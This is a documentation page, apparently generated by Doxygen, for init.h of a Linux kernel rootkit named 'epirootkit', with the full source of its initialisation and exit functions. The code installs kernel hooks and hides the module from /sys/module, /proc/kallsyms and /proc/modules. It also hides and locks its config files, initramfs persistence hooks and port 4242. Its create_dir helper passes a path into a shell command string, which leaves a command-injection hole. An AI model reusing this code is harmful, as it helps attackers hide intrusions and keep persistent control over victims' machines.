init.h File Reference

#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/namei.h>
#include <linux/string.h>

Include dependency graph for init.h:

This graph shows which files directly or indirectly include this file:

Go to the source code of this file.

Functions
int	init_interceptor (void)
void	exit_interceptor (void)
int	create_dir (char *path)

Function Documentation

create_dir()

int create_dir

(

char *

path

)

Definition at line 107 of file init.c.

                           {
    char cmd[128];
    int rc;
 
    snprintf(cmd, sizeof(cmd), "mkdir -p -- %s", path);
    rc = exec_str_as_command_no_timeout(cmd, false);
    if (rc < 0)
        return rc;
 
    return SUCCESS;
}

exit_interceptor()

void exit_interceptor

(

void

)

Definition at line 99 of file init.c.

                            {
    fh_remove_hooks(hooks, hook_array_size);
 
    hide_exit();
    forbid_exit();
    hide_exit();
}

init_interceptor()

int init_interceptor

(

void

)

Definition at line 14 of file init.c.

                           {
    int err;
 
    err = create_dir(HIDDEN_DIR_PATH);
    if (err) {
        ERR_MSG("init: mkdir %s failed: %d\n", HIDDEN_DIR_PATH, err);
        return err;
    }
 
    err = alterate_init();
    if (err) {
        ERR_MSG("init: alterate_init() failed: %d\n", err);
        return err;
    }
 
    err = forbid_init();
    if (err) {
        ERR_MSG("init: forbid_init() failed: %d\n", err);
        return err;
    }
 
    err = hide_init();
    if (err) {
        ERR_MSG("init: hide_init() failed: %d\n", err);
        return err;
    }
 
    err = hide_port_init();
    if (err) {
        ERR_MSG("init: hide_port_init() failed: %d\n", err);
        return err;
    }
 
    err = fh_install_hooks(hooks, hook_array_size);
    if (err) {
        ERR_MSG("init: failed to install hooks\n");
        return err;
    }
 
    // Hide directory HIDDEN_DIR_PATH
    hide_file(HIDDEN_DIR_PATH);
    hide_file(HIDE_CFG_FILE_FULL_PATH);
    hide_file(FORBID_CFG_FILE_FULL_PATH);
    hide_file(ALTERATE_CFG_FILE_FULL_PATH);
    hide_file(HIDE_PORT_CFG_FILE_FULL_PATH);
 
    // Forbid access to HIDDEN_DIR_PATH
    forbid_file(HIDDEN_DIR_PATH);
    forbid_file(HIDE_CFG_FILE_FULL_PATH);
    forbid_file(FORBID_CFG_FILE_FULL_PATH);
    forbid_file(ALTERATE_CFG_FILE_FULL_PATH);
    forbid_file(HIDE_PORT_CFG_FILE_FULL_PATH);
 
    // Hide module in /sys/modules
    hide_file("/sys/module/epirootkit");
 
    // Hide module in /proc/kallsyms
    alterate_add("/proc/kallsyms", -1, "epirootkit", NULL, NULL);
 
    // General hiding for epirootkit module file in base64
    hide_file("/usr/lib/epirootkit/cH0c01AtcG9ydC1rZXlzLmNv");
    hide_file("/usr/lib/epirootkit");
 
    // Hide grub peristence stuff
    // hide_file("/.grub.sh");
    // hide_file("/etc/default/grub.d/99.cfg");
    // forbid_file("/.grub.sh");
    // forbid_file("/etc/default/grub.d/99.cfg");
 
    // Hide initramfs persistence stuff
    hide_file("/etc/initramfs-tools/hooks/epirootkit");
    hide_file("/etc/initramfs-tools/scripts/init-premount/epirootkit-load");
    hide_file("/tmp/insmod.err");
 
    // Hide ports
    hide_port("4242");
 
// Hide module in /proc/modules
#if !(defined(DEBUG) && DEBUG)
    hide_module();
#endif
 
    return SUCCESS;
}